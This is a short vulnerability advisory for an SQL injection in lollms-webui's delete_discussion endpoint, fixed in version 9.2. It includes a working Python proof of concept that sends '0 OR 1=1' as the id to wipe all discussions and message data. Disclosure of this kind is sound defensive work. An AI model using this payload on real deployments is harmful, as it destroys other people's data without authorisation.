SQL Injection in lollms-webui leads to denial of service
(,9.1], Fixed in 9.2
An SQL injection condition exists in delete_discussion(), allowing a malicious actor to delete all discussions and message data from the application. This vulnerability can simply be exploited by sending a crafted HTTP POST request to the /delete_discussion which will call the vulnerable internal delete_discussion() function.
// PoC.py
import requests
IP_ADDRESS = "aaa.bbb.ccc.ddd" #replace me
PORT = 9600
data = {
"id": "0 OR 1=1",
"client_id": 0
}
response = requests.post(f"http://{IP_ADDRESS}:{str(PORT)}/delete_discussion", json=data)
print(response.json())
No mitigations are supplied for this issue